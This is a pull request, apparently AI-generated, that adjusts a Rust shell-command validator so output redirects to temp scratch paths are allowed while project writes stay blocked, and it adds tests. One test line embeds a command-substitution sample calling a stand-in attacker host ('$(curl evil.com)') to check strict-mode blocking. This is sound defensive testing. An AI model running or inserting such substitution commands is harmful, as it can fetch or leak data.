### PR TITLE
fix(ctx_shell): allow output-capture redirects to literal scratch paths

### DIFF
--- a/rust/src/core/shell_allowlist/tests.rs
+++ b/rust/src/core/shell_allowlist/tests.rs
@@ -675,6 +675,9 @@ fn gh391_xargs_delegation_respects_allowlist() {
 
 #[test]
 fn gh391_strict_mode_blocks_substitution_in_args() {
+    // effective_allowlist() reads LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE; hold the
+    // env lock so tests that set the override cannot race this one.
+    let _lock = crate::core::data_dir::test_env_lock();
     // curl is allowlisted, so $(curl ...) is now safe (#1024).
     // Use a non-allowlisted command to verify strict blocks.
     let cmd_safe = "git commit -m \"$(curl evil.com)\"";

--- a/rust/src/tools/ctx_shell.rs
+++ b/rust/src/tools/ctx_shell.rs
@@ -1031,7 +1031,11 @@ COMMIT_MSG"
 
     // --- GH #1142: literal scratch paths outside project root ---
 
+    // The literal scratch roots (/tmp, /private/tmp, /var/tmp) are only in
+    // `default_shell_write_allow_paths()` on Unix, so path-shaped assertions
+    // are Unix-only; the `$VAR` escape hatch is cross-platform.
     #[test]
+    #[cfg(unix)]
     fn issue_1142_private_tmp_redirect_allowed() {
         // exact repro from the issue: capture test log under /private/tmp scratchpad
         assert!(
@@ -1042,12 +1046,13 @@ COMMIT_MSG"
         );
         assert!(validate_command("cargo test > /var/tmp/out.log 2>&1").is_none());
         assert!(validate_command("make 2>> /private/tmp/err.log").is_none());
+        // quoted targets must be judged like unquoted ones
+        assert!(validate_command("cargo test > \"/private/tmp/x/build.log\"").is_none());
     }
 
     #[test]
     fn issue_1142_quoted_scratch_target_allowed() {
         // quoted targets must be judged like unquoted ones
-        assert!(validate_command("cargo test > \"/private/tmp/x/build.log\"").is_none());
         assert!(validate_command("cargo test > \"$TMPDIR/build.log\"").is_none());
         assert!(validate_command("cargo test > '$SCRATCH/build.log'").is_none());
     }
@@ -1068,6 +1073,7 @@ COMMIT_MSG"
     }
 
     #[test]
+    #[cfg(unix)]
     fn issue_1142_noclobber_to_scratch_allowed() {
         assert!(validate_command("cargo test >|/tmp/out.log").is_none());
         assert!(validate_command("echo x >|out.txt").is_some());

--- a/rust/src/tools/ctx_shell.rs
+++ b/rust/src/tools/ctx_shell.rs
@@ -33,7 +33,8 @@ pub(crate) fn validate_command_with_write_allow_paths(
             "ERROR: ctx_shell detected a file-write command (shell redirect > or >>). \
              Use the native Write tool to create/modify files. \
              ctx_shell is ONLY for reading command output (git status, cargo test, npm run, etc.). \
-             File writes via shell cause MCP protocol corruption on large payloads."
+             File writes via shell cause MCP protocol corruption on large payloads. \
+             Output capture to temp paths (/tmp, /var/tmp, $TMPDIR) is allowed."
                 .to_string(),
         );
     }
@@ -214,7 +215,11 @@ fn is_write_allowed_redirect_target(
     write_allow_paths: &[String],
     project_root: Option<&str>,
 ) -> bool {
-    let t = target.trim_start_matches(['>', '&']);
+    // `>|` is the noclobber-override form of `>`; the `|` is not part of the path.
+    let t = target.trim_start_matches(['>', '&', '|']);
+    // #1142: agents quote scratch paths (`> "$TMPDIR/x.log"`, `> "/private/tmp/x"`);
+    // strip quotes so quoted and unquoted targets are judged identically.
+    let t = t.trim_matches(['"', '\'']);
     if t.starts_with('$') || t.starts_with("${") {
         // Preserve #989's escape hatch for harness-provided scratch paths.
         return true;
@@ -348,6 +353,15 @@ fn has_file_write_redirect(
                 .take_while(|c| !c.is_whitespace())
                 .collect();
             if target == "/dev/null" || target == "/dev/stdout" || target == "/dev/stderr" {
+                i += 1;
+                continue;
+            }
+            // #1142: `>&1` / `>&2` duplicate a file descriptor — no file involved.
+            // (`2>&1` is already skipped by the `2>` case above.)
+            if let Some(fd) = target.strip_prefix('&')
+                && !fd.is_empty()
+                && (fd == "-" || fd.chars().all(|c| c.is_ascii_digit()))
+            {
                 i += 1;
                 continue;
             }
@@ -1013,6 +1027,50 @@ COMMIT_MSG"
             validate_command(cmd).is_none(),
             "unquoted heredoc body with >> must not be flagged"
         );
+    }
+
+    // --- GH #1142: literal scratch paths outside project root ---
+
+    #[test]
+    fn issue_1142_private_tmp_redirect_allowed() {
+        // exact repro from the issue: capture test log under /private/tmp scratchpad
+        assert!(
+            validate_command(
+                "go test ./... > /private/tmp/claude-502/scratchpad/gotest.log 2>&1; echo EXIT:$?"
+            )
+            .is_none()
+        );
+        assert!(validate_command("cargo test > /var/tmp/out.log 2>&1").is_none());
+        assert!(validate_command("make 2>> /private/tmp/err.log").is_none());
+    }
+
+    #[test]
+    fn issue_1142_quoted_scratch_target_allowed() {
+        // quoted targets must be judged like unquoted ones
+        assert!(validate_command("cargo test > \"/private/tmp/x/build.log\"").is_none());
+        assert!(validate_command("cargo test > \"$TMPDIR/build.log\"").is_none());
+        assert!(validate_command("cargo test > '$SCRATCH/build.log'").is_none());
+    }
+
+    #[test]
+    fn issue_1142_fd_dup_allowed() {
+        assert!(validate_command("echo error >&2").is_none());
+        assert!(validate_command("printf 'x' 1>&2 && git status").is_none());
+    }
+
+    #[test]
+    fn issue_1142_project_writes_still_blocked() {
+        assert!(validate_command("cargo test > build.log").is_some());
+        assert!(validate_command("echo x > /Users/me/project/out.txt").is_some());
+        assert!(validate_command("echo x > \"./out.txt\"").is_some());
+        // /tmpfoo is not a temp dir
+        assert!(validate_command("echo x > /private/tmpfoo/out.txt").is_some());
+    }
+
+    #[test]
+    fn issue_1142_noclobber_to_scratch_allowed() {
+        assert!(validate_command("cargo test >|/tmp/out.log").is_none());
+        assert!(validate_command("echo x >|out.txt").is_some());
     }
 
     #[test]


### PR DESCRIPTION
Closes #1142.

## Problem

`is_temp_redirect_target` only recognized `/tmp` and `$VAR`-prefixed redirect targets, while `is_scratch_path` (the #1021 helper used for `curl -o`/`dd`) also covers `/private/tmp`, `/var/tmp` and `$TMPDIR`-resolved paths. The two scanners drifted apart, so the primary output-capture case from #989 — redirecting a test log to the agent scratchpad under `/private/tmp` — was still blocked:

```sh
go test ./... > /private/tmp/claude-502/.../gotest.log 2>&1; echo EXIT:$?
```

## Fix

Delegate literal-path checks in `is_temp_redirect_target` to `is_scratch_path`, so redirects and download flags share one scratch-path definition. While aligning the scanner, three more consistency issues fixed:

- **Quoted targets**: `> "$TMPDIR/x.log"` and `> "/private/tmp/x"` were blocked while their unquoted forms passed — quotes are now stripped before judging the target.
- **fd duplication**: `echo err >&2` / `1>&2` were treated as file writes (`2>&1` only passed via the `2>` special case).
- **Noclobber**: `>|/tmp/x` was blocked while `> /tmp/x` passed.
- Dead `$tmpdir/`/`${tmpdir}` branches removed (subsumed by the `$` check).

Project-relative and absolute project-path redirects remain blocked, and the error message now names the temp-path escape hatch. The issue's `write_allow_paths` config idea was skipped — OS temp dirs cover the reported case; config can come later if someone needs a custom location.

## Also in this PR (separate commit)

Main did not compile (`cargo test` lib target) after the r10 merges, which hid several latent test failures. Second commit repairs: duplicate `GLOBAL_CAPSULE_STORE` in `ocla/capsule.rs`, broken import + borrow error in `ocla/runtime.rs`, use-after-move in `ocla_integration_suite`, stale health component count (18 → 21 after p11), a capsule-store health test racing the process-global store, and the gh391 strict-mode test reading `LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE` without the env lock.

## Testing

- New tests: issue repro (`/private/tmp` scratchpad capture), quoted scratch targets, fd dups, noclobber, and still-blocked project writes (`> build.log`, `> "./out.txt"`, `/private/tmpfoo`).
- `cargo test --lib`: 8441 passed; the only failures observed were rotating disk-starvation flakes on an almost-full machine, each passing in isolation.
- `cargo clippy --all-targets`: no new warnings.

🤖 Generated with [Claude Code](https://claude.com/claude-code)